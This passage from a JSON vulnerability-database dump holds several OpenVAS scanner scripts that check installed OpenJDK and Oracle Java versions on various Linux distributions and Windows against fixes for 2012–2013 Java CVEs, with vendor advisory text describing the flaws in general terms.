{\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-7-jre\", ver:\"7u9-2.3.4-0ubuntu1.12.10.1\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-7-jre-headless\", ver:\"7u9-2.3.4-0ubuntu1.12.10.1\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-7-jre-lib\", ver:\"7u9-2.3.4-0ubuntu1.12.10.1\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-7-jre-zero\", ver:\"7u9-2.3.4-0ubuntu1.12.10.1\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-18T11:09:21", "description": "Check for the Version of java-1_7_0-openjdk", "cvss3": {}, "published": "2013-03-11T00:00:00", "type": "openvas", "title": "SuSE Update for java-1_7_0-openjdk openSUSE-SU-2013:0199-1 (java-1_7_0-openjdk)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2018-01-17T00:00:00", "id": "OPENVAS:850427", "href": "http://plugins.openvas.org/nasl.php?oid=850427", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2013_0199_1.nasl 8448 2018-01-17 16:18:06Z teissa $\n#\n# SuSE Update for java-1_7_0-openjdk openSUSE-SU-2013:0199-1 (java-1_7_0-openjdk)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is 
distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"java-1_7_0-openjdk was updated to icedtea-2.3.4 fixing bugs\n and also severe security issues:\n\n * Security fixes\n - S8004933, CVE-2012-3174: Improve MethodHandle\n interaction with libraries\n - S8006017, CVE-2013-0422: Improve lookup resolutions\n - S8006125: Update MethodHandles library interactions\n\n * Bug fixes\n - S7197906: BlockOffsetArray::power_to_cards_back() needs\n to handle &gt; 32 bit shifts\n - G422525: Fix building with PaX enabled kernels.\n - use gpg-offline to check the validity of icedtea tarball\n\n - use jamvm on %arm\n - use icedtea package name instead of protected openjdk for\n jamvm builds\n - fix armv5 build\n\n - update to java access bridge 1.26.2\n * bugfix release, mainly 64bit JNI and JVM support\n\n - fix a segfault in AWT code - (bnc#792951)\n * add openjdk-7-src-b147-awt-crasher.patch\n - turn pulseaudio off on pre 11.4 distros\";\n\n\ntag_affected = \"java-1_7_0-openjdk on openSUSE 12.2\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.opensuse.org/opensuse-security-announce/2013-01/msg00025.html\");\n script_id(850427);\n script_version(\"$Revision: 8448 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-17 17:18:06 +0100 (Wed, 17 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-11 18:29:19 +0530 (Mon, 11 Mar 2013)\");\n 
script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"openSUSE-SU\", value: \"2013:0199_1\");\n script_name(\"SuSE Update for java-1_7_0-openjdk openSUSE-SU-2013:0199-1 (java-1_7_0-openjdk)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of java-1_7_0-openjdk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE12.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1_7_0-openjdk\", rpm:\"java-1_7_0-openjdk~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1_7_0-openjdk-debuginfo\", rpm:\"java-1_7_0-openjdk-debuginfo~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1_7_0-openjdk-debugsource\", rpm:\"java-1_7_0-openjdk-debugsource~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1_7_0-openjdk-demo\", rpm:\"java-1_7_0-openjdk-demo~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"java-1_7_0-openjdk-demo-debuginfo\", rpm:\"java-1_7_0-openjdk-demo-debuginfo~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1_7_0-openjdk-devel\", rpm:\"java-1_7_0-openjdk-devel~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1_7_0-openjdk-devel-debuginfo\", rpm:\"java-1_7_0-openjdk-devel-debuginfo~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1_7_0-openjdk-javadoc\", rpm:\"java-1_7_0-openjdk-javadoc~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1_7_0-openjdk-src\", rpm:\"java-1_7_0-openjdk-src~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-13T12:52:04", "description": "This host is installed with Oracle Java SE and is prone to multiple\n code execution vulnerabilities.", "cvss3": {}, "published": "2013-01-17T00:00:00", "type": "openvas", "title": "Oracle Java SE Multiple Remote Code Execution Vulnerabilities (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2017-11-08T00:00:00", "id": "OPENVAS:803156", "href": "http://plugins.openvas.org/nasl.php?oid=803156", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_oracle_java_se_mult_code_execution_vuln_win.nasl 7699 2017-11-08 12:10:34Z santu $\n#\n# Oracle Java SE Multiple Remote Code Execution Vulnerabilities (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# 
Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_insight = \"- An error in Java Management Extensions (JMX) MBean components which allows\n remote attackers to execute arbitrary code via unspecified vectors.\n - An unspecified error exists within the Libraries subcomponent.\n\n NOTE: The vendor reports that only version 7.x is affected. 
However,\n some security researchers indicate that some 6.x versions may\n be affected\";\n\ntag_impact = \"Successful exploitation allows remote attackers to execute arbitrary code\n via unspecified vectors,\n Impact Level: System/Application\";\n\ntag_affected = \"Oracle Java version 7 before Update 11 on windows\";\ntag_solution = \"Upgrade to Oracle Java 7 Update 11 or later\n For updates refer to\n http://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html\";\ntag_summary = \"This host is installed with Oracle Java SE and is prone to multiple\n code execution vulnerabilities.\";\n\nif(description)\n{\n script_id(803156);\n script_version(\"$Revision: 7699 $\");\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_bugtraq_id(57246, 57312);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-11-08 13:10:34 +0100 (Wed, 08 Nov 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-17 12:41:59 +0530 (Thu, 17 Jan 2013)\");\n script_name(\"Oracle Java SE Multiple Remote Code Execution Vulnerabilities (Windows)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/51820/\");\n script_xref(name : \"URL\" , value : \"http://securitytracker.com/id?1027972\");\n script_xref(name : \"URL\" , value : \"http://www.kb.cert.org/vuls/id/625617\");\n script_xref(name : \"URL\" , value : \"http://www.oracle.com/technetwork/java/javase/7u11-relnotes-1896856.html\");\n script_xref(name : \"URL\" , value : \"http://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_java_prdts_detect_win.nasl\");\n script_require_keys(\"Sun/Java/JRE/Win/Ver\");\n script_tag(name : \"impact\" , value : 
tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\n## Variable Initialization\njreVer = \"\";\n\n## Get JRE Version from KB\njreVer = get_kb_item(\"Sun/Java/JRE/Win/Ver\");\n\nif(jreVer)\n{\n ## Check for Oracle Java SE versions 1.7 to 1.7.0_10\n if(version_in_range(version:jreVer, test_version:\"1.7\", test_version2:\"1.7.0.10\")){\n security_message(0);\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-26T11:09:54", "description": "Check for the Version of java-1.7.0-openjdk", "cvss3": {}, "published": "2013-01-21T00:00:00", "type": "openvas", "title": "Fedora Update for java-1.7.0-openjdk FEDORA-2013-0853", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2018-01-26T00:00:00", "id": "OPENVAS:865170", "href": "http://plugins.openvas.org/nasl.php?oid=865170", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for java-1.7.0-openjdk FEDORA-2013-0853\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"java-1.7.0-openjdk on Fedora 18\";\ntag_insight = \"The OpenJDK runtime environment.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2013-January/096967.html\");\n script_id(865170);\n script_version(\"$Revision: 8542 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-26 07:57:28 +0100 (Fri, 26 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-21 09:33:40 +0530 (Mon, 21 Jan 2013)\");\n script_cve_id(\"CVE-2013-0422\", \"CVE-2012-3174\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2013-0853\");\n script_name(\"Fedora Update for java-1.7.0-openjdk FEDORA-2013-0853\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of java-1.7.0-openjdk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = 
get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.9~2.3.4.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-26T11:09:47", "description": "Check for the Version of java", "cvss3": {}, "published": "2013-01-21T00:00:00", "type": "openvas", "title": "CentOS Update for java CESA-2013:0165 centos5 ", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2018-01-25T00:00:00", "id": "OPENVAS:881557", "href": "http://plugins.openvas.org/nasl.php?oid=881557", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for java CESA-2013:0165 centos5 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"These packages provide the OpenJDK 7 Java Runtime Environment and the\n OpenJDK 7 Software Development Kit.\n\n Two improper permission check issues were discovered in the reflection API\n in OpenJDK. An untrusted Java application or applet could use these flaws\n to bypass Java sandbox restrictions. (CVE-2012-3174, CVE-2013-0422)\n \n This erratum also upgrades the OpenJDK package to IcedTea7 2.3.4. Refer to\n the NEWS file, linked to in the References, for further information.\n \n All users of java-1.7.0-openjdk are advised to upgrade to these updated\n packages, which resolve these issues. 
All running instances of OpenJDK Java\n must be restarted for the update to take effect.\";\n\n\ntag_affected = \"java on CentOS 5\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2013-January/019203.html\");\n script_id(881557);\n script_version(\"$Revision: 8526 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-25 07:57:37 +0100 (Thu, 25 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-21 09:37:56 +0530 (Mon, 21 Jan 2013)\");\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2013:0165\");\n script_name(\"CentOS Update for java CESA-2013:0165 centos5 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of java\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.9~2.3.4.el5_9.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-demo\", 
rpm:\"java-1.7.0-openjdk-demo~1.7.0.9~2.3.4.el5_9.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.9~2.3.4.el5_9.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-javadoc\", rpm:\"java-1.7.0-openjdk-javadoc~1.7.0.9~2.3.4.el5_9.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-src\", rpm:\"java-1.7.0-openjdk-src~1.7.0.9~2.3.4.el5_9.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:09", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2013-01-21T00:00:00", "type": "openvas", "title": "Fedora Update for java-1.7.0-openjdk FEDORA-2013-0853", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310865170", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310865170", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for java-1.7.0-openjdk FEDORA-2013-0853\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty 
of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2013-January/096967.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.865170\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-21 09:33:40 +0530 (Mon, 21 Jan 2013)\");\n script_cve_id(\"CVE-2013-0422\", \"CVE-2012-3174\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2013-0853\");\n script_name(\"Fedora Update for java-1.7.0-openjdk FEDORA-2013-0853\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'java-1.7.0-openjdk'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC18\");\n script_tag(name:\"affected\", value:\"java-1.7.0-openjdk on Fedora 18\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = 
rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.9~2.3.4.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:55", "description": "Oracle Linux Local Security Checks ELSA-2013-0165", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2013-0165", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310123748", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123748", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2013-0165.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
\"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.9~2.3.8.0.0.1.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-demo\", rpm:\"java-1.7.0-openjdk-demo~1.7.0.9~2.3.8.0.0.1.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.9~2.3.8.0.0.1.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-javadoc\", rpm:\"java-1.7.0-openjdk-javadoc~1.7.0.9~2.3.8.0.0.1.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-src\", rpm:\"java-1.7.0-openjdk-src~1.7.0.9~2.3.8.0.0.1.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-24T11:10:09", "description": "Check for the Version of java", "cvss3": {}, "published": "2013-03-12T00:00:00", "type": "openvas", "title": "CentOS Update for java CESA-2013:0605 centos6 ", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-0809", "CVE-2013-1493"], "modified": "2018-01-24T00:00:00", "id": "OPENVAS:881649", "href": "http://plugins.openvas.org/nasl.php?oid=881649", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for java CESA-2013:0605 centos6 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or 
any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"These packages provide the OpenJDK 6 Java Runtime Environment and the\n OpenJDK 6 Software Development Kit.\n\n An integer overflow flaw was found in the way the 2D component handled\n certain sample model instances. A specially-crafted sample model instance\n could cause Java Virtual Machine memory corruption and, possibly, lead to\n arbitrary code execution with virtual machine privileges. (CVE-2013-0809)\n \n It was discovered that the 2D component did not properly reject certain\n malformed images. Specially-crafted raster parameters could cause Java\n Virtual Machine memory corruption and, possibly, lead to arbitrary code\n execution with virtual machine privileges. (CVE-2013-1493)\n \n Note: If your system has not yet been upgraded to Red Hat Enterprise Linux\n 6.4 and the web browser plug-in provided by the icedtea-web package was\n installed, the issues exposed via Java applets could have been exploited\n without user interaction if a user visited a malicious website. Thus, this\n update has been rated as having critical security impact as a one time\n exception. The icedtea-web package as provided with Red Hat Enterprise\n Linux 6.4 uses OpenJDK 7 instead.\n \n This erratum also upgrades the OpenJDK package to IcedTea6 1.11.9. 
Refer to\n the NEWS file, linked to in the References, for further information.\n \n All users of java-1.6.0-openjdk are advised to upgrade to these updated\n packages, which resolve these issues. All running instances of OpenJDK Java\n must be restarted for the update to take effect.\";\n\n\ntag_affected = \"java on CentOS 6\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2013-March/019623.html\");\n script_id(881649);\n script_version(\"$Revision: 8509 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-24 07:57:46 +0100 (Wed, 24 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-12 09:59:46 +0530 (Tue, 12 Mar 2013)\");\n script_cve_id(\"CVE-2013-0809\", \"CVE-2013-1493\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2013:0605\");\n script_name(\"CentOS Update for java CESA-2013:0605 centos6 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of java\");\n 